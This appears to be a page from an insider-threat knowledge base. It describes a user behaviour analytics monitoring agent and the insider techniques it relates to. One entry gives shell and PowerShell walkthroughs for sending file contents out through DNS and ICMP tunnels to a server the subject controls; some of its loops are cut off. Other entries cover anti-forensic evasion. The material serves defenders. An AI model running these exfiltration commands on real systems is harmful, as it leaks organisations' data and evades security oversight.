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Insider Threat Matrix™

  • ID: DT047
  • Created: 02nd June 2024
  • Updated: 19th July 2024
  • Platforms: Windows, Linux, MacOS
  • Contributor: The ITM Team

Agent Capable of User Behaviour Analytics

An agent capable of User Behaviour Analytics (UBA) is a software agent installed on organizational endpoints (such as laptops). Typically, User Activity Monitoring agents are only deployed on endpoints where a human user is expected to conduct the activity.


The User Behaviour Analytics agent will typically record Operating System, application, and network activity occurring on an endpoint, focusing on activity that is or can be conducted by a human user. Typically, User Behaviour Analytics platforms operate in an agent/server model where activity logs are sent to a server for automatic analysis. In the case of User Behaviour Analytics, this analysis will typically be conducted against a baseline that has previously been established.


A User Behaviour Analytic platform will typically conduct a period of ‘baselining’ when the platform is first installed. This baselining period establishes the normal behavior parameters for an organization’s users, which are used to train a Machine Learning (ML) model. This ML model can then be later used to automatically identify activity that is predicted to be an anomaly, which is hoped to surface user behavior that is undesirable, risky, or malicious.


Other platforms providing related functionality are frequently referred to as User Activity Monitoring (UAM) platforms.


ID Name Description
ME006Web Access

A subject can access the web with an organization device.

ME007Privileged Access

A subject has privileged access to devices, systems or services that hold sensitive information.

ME009FTP Servers

A subject is able to access external FTP servers.

ME010SSH Servers

A subject is able to access external SSH servers.

PR019Private / Incognito Browsing

Private browsing, also known as 'incognito mode' among other terms, is a feature in modern web browsers that prevents the storage of browsing history, cookies, and site data on a subject's device. When private browsing is enabled, it ensures any browsing activity conducted during the browser session is not saved to the browser history or cache.


A subject can use private browsing to conceal their actions in a web browser, such as navigating to unauthorized websites, downloading illicit materials, uploading corporate data or conducting covert communications, thus leaving minimal traces of their browsing activities on a device and frustrating forensic recovery efforts.

PR020Data Obfuscation

Data obfuscation is the act of deliberately obscuring or disguising data to avoid detection and/or hinder forensic analysis. A subject may obscure data in preparation to exfiltrate the data.

PR021Network Scanning

A subject conducts a scan of a network to identify additional systems, or services running on those systems.

IF017Excessive Personal Use

A subject uses organizational resources, such as internet access, email, or work devices, for personal activities both during and outside work hours, exceeding reasonable personal use. This leads to reduced productivity, increased security risks, and the potential mixing of personal and organizational data, ultimately affecting the organization’s efficiency and overall security.

IF018Sharing on AI Chatbot Platforms

A subject interacts with a public Artificial Intelligence (AI) chatbot (such as ChatGPT and xAI Grok), leading to the intentional or unintentional sharing of sensitive information.

AF016Uninstalling Software

The subject uninstalls software, which may also remove relevant artifacts from the system's disk, such as regsitry keys or files necessary for the software to run, preventing them from being used by investigators to track activity.

PR023Suspicious Web Browsing

A subject engages in web searches that may indicate research or information gathering related to potential infringement or anti-forensic activities. Examples include searching for software that could facilitate data exfiltration, methods for deleting or modifying system logs, or techniques to evade security controls. Such activity could signal preparation for a potential insider event.

AF017Use of a Virtual Machine

The subject uses a virtual machine (VM) to contain artifacts of forensic value within the virtualized environment, preventing them from being written to the host file system. This strategy helps to obscure evidence and complicate forensic investigations.

By running a guest operating system within a VM, the subject can potentially evade detection by security agents installed on the host operating system, as these agents may not have visibility into activities occurring within the VM. This adds an additional layer of complexity to forensic analysis, making it more challenging to detect and attribute malicious activities.

IF020Unauthorized VPN Client

The subject installs and uses an unapproved VPN client, potentially violating organizational policy. By using a VPN service not controlled by the organization, the subject can bypass security controls, reducing the security team’s visibility into network activity conducted through the unauthorized VPN. This could lead to significant security risks, as monitoring and detection mechanisms are circumvented.

IF019Non-Corporate Device

The subject performs work-related tasks on an unauthorized, non-organization-owned device, likely violating organizational policy. Without the organization’s security controls in place, this device could be used to bypass established safeguards. Moreover, using a personal device increases the risk of sensitive data being retained or exposed, particularly after the subject is offboarded, as the organization has no visibility or control over information stored outside its managed systems.


A subject joins the organisation with the pre-formed intent to gain access to sensitive data or otherwise contravene internal policies.


A subject moves within the organisation to a different team with the intent to gain access to sensitive data or to circumvent controls or to otherwise contravene internal policies.


A subject leaving the organisation with access to sensitive data with the intent to access and exfiltrate sensitive data or otherwise contravene internal policies.


A subject can access personal webmail services in a browser.

ME006.002Cloud Storage

A subject can access personal cloud storage in a browser.

ME006.003Inappropriate Websites

A subject can access websites containing inappropriate content.

ME006.004Note-Taking Websites

A subject can access external note-taking websites (Such as Evernote).

ME006.005Messenger Services

A subject can access external messenger web-applications with the ability to transmit data and/or files.

PR016.001Local Data Staging

A subject stages collected data in a central location or directory local to the current system prior to exfiltration.

ME006.006Code Repositories

A subject can access websites used to access or manage code repositories.

IF016.007Excessive Overtime

A subject that self reports hours worked, and/or is eligible to claim overtime or an individual responsible for reporting such working time may falsify time records or make false representations to a working time system to cause payment or time in lieu for unperformed work.

IF004.003Exfiltration via Personal NAS Device

A subject exfiltrates data using an organization-owned device (such as a laptop) by copying the data from the device to a personal Network Attached Storage (NAS) device, which is attached to a network outside of the control of the organization, such as a home network. Later, using a personal device, the subject accesses the NAS to retrieve the exfiltrated data.

PR020.001Renaming Files or Changing File Extensions

A subject may rename a file to obscure the content of the file or change the file extension to hide the file type. This can aid in avoiding suspicion and bypassing certain security filers and endpoint monitoring tools. For example, renaming a sensitive document from FinancialReport.docx to Recipes.txt before copying it to a USB mass storage device.

IF002.001Exfiltration via USB Mass Storage Device

A subject exfiltrates data using a USB-connected mass storage device, such as a USB flash drive or USB external hard-drive.

IF002.006Exfiltration via USB to USB Data Transfer

A USB to USB data transfer cable is a device designed to connect two computers directly together for the purpose of transferring files between them. These cables are equipped with a small electronic circuit to facilitate data transfer without the need for an intermediate storage device. Typically a USB to USB data transfer cable will require specific software to be installed to facilitate the data transfer. In the context of an insider threat, a USB to USB data transfer cable can be a tool for exfiltrating sensitive data from an organization's environment.

IF002.007Exfiltration via Target Disk Mode

When a Mac is booted into Target Disk Mode (by powering the computer on whilst holding the ‘T’ key), it acts as an external storage device, accessible from another computer via Thunderbolt, USB, or FireWire connections. A subject with physical access to the computer, and the ability to control boot options, can copy any data present on the target disk, bypassing the need to authenticate to the target computer.

AF004.001Clear Chrome Artifacts

A subject clears Google Chrome browser artifacts to hide evidence of their activities, such as visited websites, cache, cookies, and download history.

AF004.003Clear Firefox Artifacts

A subject clears Mozzila Firefox browser artifacts to hide evidence of their activities, such as visited websites, cache, cookies, and download history.

AF004.002Clear Edge Artifacts

A subject clears Microsoft Edge browser artifacts to hide evidence of their activities, such as visited websites, cache, cookies, and download history.

IF008.003Terrorist Content

A subject accesses, possesses and/or distributes materials that advocate, promote, or incite unlawful acts of violence intended to further political, ideological or religious aims (terrorism).

IF008.004Extremist Content

A person accesses, possesses, or distributes materials that advocate, promote, or incite extreme ideological, political, or religious views, often encouraging violence or promoting prejudice against individuals or groups.

IF001.005Exfiltration via Note-Taking Web Services

A subject uploads confidential organization data to a note-taking web service, such as Evernote. The subject can then access the confidential data outside of the organization from another device.

ME006.007Text Storage Websites

A subject can access external text storage websites, such as Pastebin.

IF004.004Exfiltration via Screen Sharing Software

A subject exfiltrates data outside of the organization's control using the built-in file transfer capabilities of software such as Teamviewer.

IF004.005Exfiltration via Protocol Tunneling

A subject exfiltrates data from an organization by encapsulating or hiding it within an otherwise legitimate protocol. This technique allows the subject to covertly transfer data, evading detection by standard security monitoring tools. Commonly used protocols, such as DNS and ICMP, are often leveraged to secretly transmit data to an external destination.

DNS Tunneling (Linux)
A simple example of how DNS tunneling might be achieved with 'Living off the Land' binaries (LoLBins) in Linux:


  • A domain the subject controls or can use for DNS queries.
  • A DNS server to receive and decode the DNS queries.



1. The subject uses xxd to create a hex dump of the file they wish to exfiltrate. For example, if the file is secret.txt:


xxd -p secret.txt > secret.txt.hex

2. The subject splits the hexdump into manageable chunks that can fit into DNS query labels (each label can be up to 63 characters, but it’s often safe to use a smaller size, such as 32 characters):


split -b 32 secret.txt.hex hexpart_


3. The subject uses dig to send the data in DNS TXT queries. Looping through the split files and sending each chunk as the subdomain of in a TXT record query:


for part in hexpart_*; do
   h=$(cat $part)
   dig txt $


On the target DNS server that they control, the subject captures the incoming DNS TXT record queries on the receiving DNS server and decode the reassembled hex data from the subdomain of the query.


DNS Tunneling (Windows)
A simple example of how DNS tunneling might be achieved with PowerShell in Windows:



  • A the subject you controls.
    A DNS server or a script on the subjects server to capture and decode the DNS queries.


1. The subject converts the sensitive file to hex:


$filePath = "C:\path\to\your\secret.txt"
$hexContent = [System.BitConverter]::ToString([System.IO.File]::ReadAllBytes($filePath)) -replace '-', ''


2. The subject splits the hex data into manageable chunks that can fit into DNS query labels (each label can be up to 63 characters, but it’s often safe to use a smaller size, such as 32 characters):


$chunkSize = 32
$chunks = $hexContent -split "(.{$chunkSize})" | Where-Object { $_ -ne "" }


3. The subject sends the data in DNS TXT queries. Looping through the hex data chunks and sending each chunk as the subdomain of in a TXT record query:


$domain = ""

foreach ($chunk in $chunks) {
   $query = "$chunk.$domain"
   Resolve-DnsName -Name $query -Type TXT


The subject will capture the incoming DNS TXT record queries on the receiving DNS server and decode the reassembled hex data from the subdomain of the query.


ICMP Tunneling (Linux)
A simple example of how ICMP tunneling might be achieved with 'Living off the Land' binaries (LOLBins) in Linux:


  • The subject has access to a server that can receive and process ICMP packets.
  • The subject has root privileges on both client and server machines (as ICMP usually requires elevated permissions).



1. The subject uses xxd to create a hex dump of the file they wish to exfiltrate. For example, if the file is secret.txt:


xxd -p secret.txt > secret.txt.hex


2. The subject splits the hexdump into manageable chunks. ICMP packets have a payload size limit, so it’s common to use small chunks. The following command will split the hex data into 32-byte chunks:

split -b 32 secret.txt.hex hexpart_


3. The subject uses ping to send the data in ICMP echo request packets. Loop through the split files and send each chunk as part of the ICMP payload:

for part in hexpart_*; do
   h=$(cat $part)
   ping -c 1 -p "$h" $DESTINATION_IP


The subject will capture the incoming ICMP packets on the destination server, extract the data from the packets and decode the reassembled the hex data.

IF002.009Exfiltration via Disk Media

A subject exfiltrates data using writeable disk media.

IF011.001Intentionally Weakening Network Security Controls For a Third Party

The subject intentionally weakens or bypasses network security controls for a third party, such as providing credentials or disabling security controls.

IF018.001Exfiltration via AI Chatbot Platform History

A subject intentionally submits sensitive information when interacting with a public Artificial Intelligence (AI) chatbot (such as ChatGPT and xAI Grok). They will access the conversation at a later date to retrieve information on a different system.

IF018.002Reckless Sharing on AI Chatbot Platforms

A subject recklessly interacts with a public Artificial Intelligence (AI) chatbot (such as ChatGPT and xAI Grok), leading to the inadvertent sharing of sensitive information. The submission of sensitive information to public AI platforms risks exposure due to potential inadequate data handling or security practices. Although some platforms are designed not to retain specific personal data, the reckless disclosure could expose the information to unauthorized access and potential misuse, violating data privacy regulations and leading to a loss of competitive advantage through the exposure of proprietary information.

MT012.003Psychological Manipulation

A third party uses deception, exploitation, or other unethical methods to psychologically manipulate a subject over time, with the intent to influence their perceptions, actions, and decisions. This manipulation can lead the subject to, knowingly or unknowingly, act against the organization’s interests.

AF018.003Canary Tokens

A subject uses files with canary tokens as a tripwire mechanism to detect the presence of security personnel or investigation activities within a compromised environment. This method involves strategically placing files embedded with special identifiers (canary tokens) that trigger alerts when accessed. For example:


The subject creates files containing canary tokens—unique identifiers that generate an alert when they are accessed, opened, or modified. These files can appear as regular documents, logs, configurations, or other items that might attract the attention of an investigator during a security response.


The subject strategically places these files in various locations within the environment:

  • Endpoints: Files with canary tokens are stored in directories where digital forensics or malware analysis is likely to occur, such as system logs, user data directories, or registry entries.
  • Cloud Storage: The files are uploaded to cloud storage buckets, virtual machines, or application databases where security teams might search for indicators of compromise.
  • Network Shares: Shared drives and network locations where forensic investigators or security tools may perform scans.


Once in place, the canary token within each file serves as a silent tripwire. The token monitors for access and automatically triggers an alert if an action is detected:

  • Access Detection: If a security tool, administrator, or investigator attempts to open, modify, or copy the file, the embedded canary token sends an alert to an external server controlled by the subject.
  • Network Traffic: The token can initiate an outbound network request (e.g., HTTP, DNS) to a specified location, notifying the subject of the exact time and environment where the access occurred.
  • Behavior Analysis: The subject might include multiple canary files, each with unique tokens, to identify the pattern of investigation, such as the sequence of directories accessed or specific file types of interest to the security team.


Upon receiving an alert from a triggered canary token, the subject can take immediate steps to evade detection:

  • Alert the Subject: The canary token sends a covert signal to the subject's designated server or communication channel, notifying them of the potential investigation.
  • Halt Malicious Activity: The subject can use this warning to suspend ongoing malicious actions, such as data exfiltration or command-and-control communications, to avoid further detection.
  • Clean Up Evidence: Scripts can be triggered to delete or alter logs, remove incriminating files, or revert system configurations to their original state, complicating any forensic investigation.
  • Feign Normalcy: The subject can restore or disguise compromised systems to appear as though nothing suspicious has occurred, minimizing signs of tampering.


By using files with canary tokens as tripwires, a subject can gain early warning of investigative actions and respond quickly to avoid exposure. This tactic allows them to outmaneuver standard security investigations by leveraging silent alerts that inform them of potential security team activity.


A third party uses threats or intimidation to demand that a subject divulge information, grant access to devices or systems, or otherwise cause harm or undermine a target organization.

MT012.001Social Engineering (Inbound)

A third party deceptively manipulates and/or persuades a subject to divulge information, or gain access to devices or systems, or to otherwise cause harm or undermine a target organization.

MT005.001Speculative Corporate Espionage

A subject covertly collects confidential or classified information, or gains access, with the intent to sell it to a third party private organization.